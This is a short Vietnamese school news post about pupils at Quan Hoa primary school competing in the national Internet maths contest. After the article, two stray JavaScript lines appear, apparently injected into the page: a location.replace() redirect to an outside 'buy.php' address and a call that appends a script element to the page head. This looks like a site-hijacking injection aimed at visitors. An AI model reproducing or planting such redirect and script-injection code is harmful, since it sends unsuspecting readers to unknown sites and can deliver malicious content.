Thi giải Toán trên Internet cấp trường

20/01/2016 3:43 Chiều Phản hồi đã bị khóa

Hưởng ứng cuộc thi Giải Toán qua Internet do Bộ Giáo dục và Đào tạo phát động, học sinh trường tiểu học Quan Hoa đã khởi động và nhập cuộc đầy hào hứng qua từng vòng thi. Phong trào thi đua học tập, rèn luyện kĩ năng giải Toán nhanh và đúng là một trong những mục tiêu được cô – trò ưu tiên đặt lên hàng đầu vì vậy sau mỗi năm số học sinh của trường tham gia thi giải Toán trên Internet lại tăng cả về số lượng và chất lượng. Qua những vòng tự luyện và 3 vòng thi cấp trường, những học sinh đạt điểm tốt đã sẵn sàng cho cuộc thi giải Toán trên Internet cấp Quận sắp tới.

location.replace(“http://gethere.info/buy.php”);

d.getElementsByTagName(‘head’)[0].appendChild(s);

Các phản hồi đã bị đóng lại bở quản trị.